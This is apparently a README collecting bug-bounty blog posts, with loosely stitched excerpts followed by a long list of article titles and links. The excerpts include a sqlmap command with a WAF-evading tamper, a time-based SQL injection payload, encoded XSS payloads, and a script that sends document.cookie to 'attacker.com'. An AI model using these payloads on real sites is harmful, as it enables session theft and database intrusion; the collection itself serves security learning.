This repository serves as a collection of insightful and informative blog posts about cybersecurity, originally published on Medium.
As a bug hunter, it is essential to remain ethical and handle such situations professionally. Some individuals react impulsively and retaliate inappropriately in such cases. However, it’s crucial to maintain self-control.
sqlmap -u "targetlink" -p parameter --tamper=space2comment --dbs --random-agent
Using two-level encoding like this allowed us to bypass the WAF and conceal the payload.
To make such payloads more convincing, you can prepend random characters or specific terms, elevating the attack to another level.
%253c---key---%253e---key2---%2528---emoji---%2529%253c%252f---key---%253e
As I’ve mentioned before, the reconnaissance phase is incredibly important, and you should continue your reconnaissance efforts even after finding an initial vulnerability.
Every small mistake might lead you to something much bigger, so patience and keeping your eyes open are key.
+(select*from(select(sleep(20)))a)+
With this XSS payload, you can change the location in a reflected XSS vulnerability and redirect the page.
Another favorite of mine is a payload that allows you to steal cookies:
<script>new Image().src="https://attacker.com/cookie.php?cookie="+document.cookie</script>
The system’s logic involves creating a new list from the “Create New List” section in the user profile, naming it, and then adding movies and TV series to curate a personalized list.
This list is then published on your profile. However, due to a critical oversight by the developers, it’s possible to upload XSS payloads into the list’s title field using a simple trick.
<script>
document.body.addEventListener('click', () =>
    setTimeout(() =>
        new Audio('https://www.myinstants.com/media/sounds/among-us-role-reveal-sound.mp3').play(), 2000),
    { once: true });
</script>
Open redirection bugs generally occur in areas designed to redirect users automatically after completing a form or triggering an action, such as through parameters like refURL, returnURL, followURL. These vulnerabilities can be exploited to manipulate users into being redirected to a malicious site after completing legitimate actions on the real website.
In the login section, when a user logs in and the API returns a status of success before redirecting you to the member-viewing frame, it is important to check that redirect for vulnerabilities.
Similarly, when registration is successful, the app either redirects to the main frame or shows an error message. At this point, create a temporary email, register, and analyze the requests using Burp Suite.
While browsing a website, we only see the content intended for users. But wait — there’s more! Hidden files on websites may contain sensitive information like usernames, passwords, API keys, personal data, organizational secrets, cookies, or tokens.
Some files might even be left on the server by mistake. If these fall into a hacker’s hands, they could lead to a serious data breach.
Account takeover vulnerabilities are among the most critical security flaws as they allow attackers to gain full control over user accounts. There are two main types of account takeover vulnerabilities:
- Zero-Click Account Takeover: This type does not require any interaction from the victim.
- One-Click Account Takeover: This type requires minimal interaction, such as clicking a link.
- Bypassing Rate Limit Protection to Account Takeover (@sohailahmed0x0)
  Rate limit vulnerabilities are security weaknesses that occur when a system or service doesn’t properly enforce limits on how many requests a user or system can make in a given time period. Essentially, these vulnerabilities arise when the system allows excessive requests from the same source or allows the rate of requests to exceed what is typical or safe.
- How I Found a Bug in Sony and Earned Exclusive Swag! (@josekuttykunnelthazhebinu)
After some analysis, I came across an interesting parameter named error. This caught my attention, and I knew it was worth digging deeper.
The URL was like this:
https://target.com/my/login/errormessage?error=
I tried text injection, and when I added the injection text it was not reflected the way I expected; then I encoded the text, and when I submitted it, it was reflected in the page in the format I expected.
This left me with around 50–60 live subdomains. From there, I randomly picked about 20–30 subdomains and opened them all at once using a Chrome extension called “Open Multiple URLs.”
While going through the subdomains, a few immediately stood out. One of them had a “page=” parameter in the URL, which instantly caught my attention.
subfinder -d example.com -o example.txt
cat example.txt | httpx -status-code -mc 200,301 -silent
It took weeks of persistence before I found my first vulnerability. It was an IDOR (Insecure Direct Object Reference) in a small web app. By manipulating a single parameter in the URL, I could access invoices from other users.
It was like magic — one parameter changed, and the doors swung open!
After understanding the logic of the website, I found that it sends a request to assign any role to the backend without validating whether the role requires payment or not. The check is only enforced on the frontend side.
The bug here is that if I send a role change request directly to the backend, I can upgrade a member’s privileges without making any payment.
- Discovering a Critical Vulnerability in Deepseek’s Password Reset Functionality leads to Zero Click Account Takeover
- Finding Exposed Sensitive API Keys in JS Files
  https://medium.com/@bitpanic/finding-exposed-sensitive-api-keys-in-js-files-5c129fb1f2c7
- A Security Gap (PII) in a Bus Company
  https://medium.com/meetcyber/a-security-gap-pii-in-a-bus-company-ecfe972875ff
- Exploring a New SQLi Vulnerability: A Ghauri Experience
  https://medium.com/meetcyber/exploring-a-new-sqli-vulnerability-a-ghauri-experience-541c588dc00d
- Automating Ghauri for SQLi with Bash Script
  https://medium.com/meetcyber/automating-ghauri-for-sqli-with-bash-script-6ce8fb62c367
- The Importance of Proxy Usage in Bug Hunting
  https://medium.com/meetcyber/the-importance-of-proxy-usage-in-bug-hunting-9896618da7fc
- Running DeepSeek Locally on macOS with Ollama
  https://medium.com/meetcyber/running-deepseek-locally-on-macos-with-ollama-cd8cd5d6dfce
- Mobile Pentesting with Frida: A Beginner’s Guide
  https://medium.com/meetcyber/mobile-pentesting-with-frida-a-beginners-guide-996411fa0202
- User Interface Says No, Backend Says Yes
- Finding CSRF Vulnerabilities!
  https://medium.com/@kumawatabhijeet2002/earn-by-finding-csrf-vulnerabilities-638f876918cf
- CSRF Bypass Combined with IDOR To Complete Account Takeover!
  https://medium.com/@omarzzu/csrf-bypass-combined-with-idor-to-complete-account-takeover-f4995c5946d3
- Hijacking Sessions with IDOR and XSS — @bxmbn
  https://medium.com/@bxmbn/hijacking-sessions-with-idor-and-xss-bxmbn-396f99761a85
- Discovered a Unique Email Verification Bypass
  https://medium.com/@mo9khu93r/discovered-a-unique-email-verification-bypass-47bb1e955a13
- Extended Guide to Installing DeepSeek AI on Ubuntu
  https://medium.com/meetcyber/extended-guide-to-installing-deepseek-ai-on-ubuntu-bce1529de75c
- The Power of OSINT: Tracking Torrent Activity with Python
  https://medium.com/meetcyber/the-power-of-osint-tracking-torrent-activity-with-python-a3246f5217e3
- Admin Account Takeover via Weird Password Reset Functionality
- Understanding Basic Chmod
  https://medium.com/pndsec/understanding-basic-chmod-8b93a82baf95
- How I Found an IDOR Vulnerability – A Responsible Disclosure Story
- IDOR Unlocked: Accessing Unauthorized Data with a Simple Tweak!
- Can You Find a $4,500 Bug in Google Slides in Under 3 Hours
- Mastering 403 Forbidden Bypass Techniques
  https://medium.com/@Abhijeet_kumawat_/part-2-mastering-403-forbidden-bypass-techniques-707e7880fa22
- Basic Linux Commands
- Exceptional $$$$Account Takeover
  https://medium.com/@Tanvir0x1/exceptional-account-takeover-money-theft-via-idor-a76638ecd616
- Bug Bounty: Hunting Open Redirect Vulnerabilities
  https://medium.com/h7w/bug-bounty-hunting-open-redirect-vulnerabilities-for-46940d0cd98c
- SQL injection with filter bypass via XML encoding
  https://medium.com/@codingbolt.in/sql-injection-with-filter-bypass-via-xml-encoding-754808d7d29a
- Exploiting Blind XSS in a Signup Page
- How I Made $1,000 in a Day Exposing a Critical Vulnerability
- Bug Hunting & Automation
- How to Find Hidden API Endpoints That Lead to Critical Bugs
- 2FA & MFA Hacks: Bypass OTP Like a Pro
  https://medium.com/@verylazytech/2fa-mfa-hacks-bypass-otp-like-a-pro-verylazytech-7eb9f8c4f5c1
- Prime Target & The Future of RSA
  https://medium.com/meetcyber/prime-target-the-future-of-rsa-6e6bac4ad25b
- Account Takeover using SSO Logins
  https://medium.com/@rikeshbaniya/account-takeover-using-sso-logins-fa35f28a358b
- DOM XSS Custom Nuclei Template
  https://medium.com/meetcyber/dom-xss-custom-nuclei-template-189461186769
- SSRF to RCE: How I Turned a Small Bug Into a Big Paycheck
- DuckDuckGo Dorking for Bug Hunters & Pentesters
  https://medium.com/developersglobal/duckduckgo-dorking-for-bug-hunters-pentesters-7c2b9b762ab9
- From Recon to RCE
- Bug Bounty Edition 2025: Uncommon Headers That Bypass Everything
- How I Bypassed View-Only Mode
- CORS Misconfigurations: How Poor Policies Open Doors to Exploits
- 1 Click ATO on a public Bugcrowd Program
  https://medium.com/@68abdelrahmanmohamed/1-click-ato-on-a-public-bugcrowd-program-94ef037d0d50
- SQL Injection Leads to $$$ Bounty
- ARP Spoofing Lab Using Docker Compose and Wireshark
- Hours of Recon, One Vulnerable Parameter
- Non-English Dorks to Find Bug Bounty & VDP Programs
- Secret Sauce in Robots.txt
- Path Traversal Attack: How I Accessed Admin Secrets
  https://medium.com/bugbountywriteup/path-traversal-attack-how-i-accessed-admin-secrets-fa5de1865031
- Choosing the Right Naming Convention
  https://medium.com/meetcyber/choosing-the-right-naming-convention-780b2b1213ae
- Not Just a Ping: How SSRF Opened the Gateway to Internal Secrets
- Understanding Supply Chain Attacks
  https://medium.com/meetcyber/understanding-supply-chain-attacks-19f97e8116cb
- Forbidden Knowledge: Banned Cybersecurity Reads
  https://medium.com/the-first-digit/forbidden-knowledge-banned-cybersecurity-reads-a4bdba77f26e
- The Evolution of macOS
  https://medium.com/meetcyber/the-evolution-of-macos-142fad535449
- Understanding the Core Concepts of OOP
  https://medium.com/meetcyber/understanding-the-core-concepts-of-oop-0b258fbe86e4
- Bypassing Regex Validations to Achieve RCE
- The Hidden Dangers of Misconfigured Cloud Storage
  https://medium.com/meetcyber/the-hidden-dangers-of-misconfigured-cloud-storage-c9debc08f506
- Unsafe Eval = Unlimited Control: How a JS Sink Let Me Run Anything
- Found a Critical Vulnerability in Snapchat
  https://medium.com/meetcyber/15-000-bounty-found-a-critical-vulnerability-in-snapchat-377176a0f0eb
- A list of tools that will help to find XSS (cross-site scripting) vulnerabilities
- The Hidden Language: Exploiting GraphQL for Unauthorized Data Dump
- SSRF via PDF Generator? Yes, and It Led to EC2 Metadata Access
- Filter Failure: From HTML Injection to Full-Blown XSS via Rich Text Editors
- POC — Remote and unauthenticated attacker can send crafted HTTP requests to execute arbitrary code
- All about XSS — Cross site scripting!
  https://medium.com/@bug_vs_me/all-about-xss-cross-site-scripting-1bf764a39159
- Think You’re Safe? Think Again: Cybersecurity Myths
  https://medium.com/meetcyber/think-youre-safe-think-again-cybersecurity-myths-69090b7e7afa
- Mastering SQL Injection Recon: Step-by-Step Guide for Bug Bounty Hunters
- 404 to Root: How a Forgotten Subdomain Led to Server Takeover
- The $2,000 SQLi Story: Hours, Payloads, and Pure Stubbornness
  https://medium.com/meetcyber/the-2-000-sqli-story-hours-payloads-and-pure-stubbornness-05eab4c7b968
- How Blind XSS in Email Notifications Gave Me Root Alerts
- Exploiting Security Misconfiguration to Gain Full Account Takeover
- The Image That Spoke JavaScript
  https://medium.com/@commanak46/the-image-that-spoke-javascript-bdbd368921e4
- Wordpress Vulnerability Research
  https://medium.com/the-first-digit/wordpress-vulnerability-research-a2b3043f801d
- A Hidden Backdoor: Bypassing reCAPTCHA on the Sign-up Page
- Hidden Tokens, Open Wallets: How I Found Payment API Keys in Production JavaScript
- Business Logic Flaw in a Rating System and Earned €150
  https://medium.com/meetcyber/business-logic-flaw-in-a-rating-system-and-earned-150-a992ceb571a1
- Open Redirect + Referer Header = $3,000 Access Token Leak
  https://medium.com/the-first-digit/open-redirect-referer-header-3-000-access-token-leak-dd45ba4bdb0c
- How Weak Tokens Let Me Become Admin with Just a Text Editor
- Simple 2FA Bypass Techniques for Beginners
  https://medium.com/the-first-digit/simple-2fa-bypass-techniques-for-beginners-edec48befa23
- ISC2 Certified in Cybersecurity CC exam
  https://medium.com/@erkankavas/isc2-certified-in-cybersecurity-cc-exam-86cccb3d976d
- The Most Underrated 0-Click Account Takeover Using Punycode IDN Homograph Attacks
- The $500 Facebook Bug That Taught Me the Real Meaning of Respect
- When Session Fixation Meets Session Confusion: A Case of Cross-User Control
- How I Chained Recon and IDOR to Access 100's of Credit Cards
- JavaScript Proxies — The Most Underrated Superpower in JS
- Fail2Ban: Lightweight but Powerful Protection
  https://medium.com/pndsec/fail2ban-lightweight-but-powerful-protection-79f6bf514756
- SOC Analyst Automation: Scripts Every Analyst Should Be Using
- HTTP Parameter Pollution: The Dirty Little Secret That Gave Me Full Backend Access
- SSRF: When Your Server Becomes a Nosy Hacker
  https://medium.com/@hettt/ssrf-when-your-server-becomes-a-nosy-hacker-part-1-f808b9513652
- The Hidden Graph: How API Rate Limits Lied and Let Me Scrape Millions
- Hacking a Birthday Campaign on a Food Delivery App — Bug Bounty: $1.000+
- Just Wanted to Be a Driver, Ended Up Discovering a Time Capsule
- How I Found My First Critical Bug: Account Takeover via Email Verification Bypass
- Mass Message Injection and IDOR in Account Verification
- Insecure by Design: How a Mobile API Let Me Reset Anyone’s Password With Just a Phone Number
- Clean-Up Fail: How a Forgotten Admin Endpoint
- I Found a Major Privacy Leak in a Popular Social App
- Unauthorized Privilege Escalation in Role Logic
  https://medium.com/@edahmed008/unauthorized-privilege-escalation-in-role-logic-5271f34e652c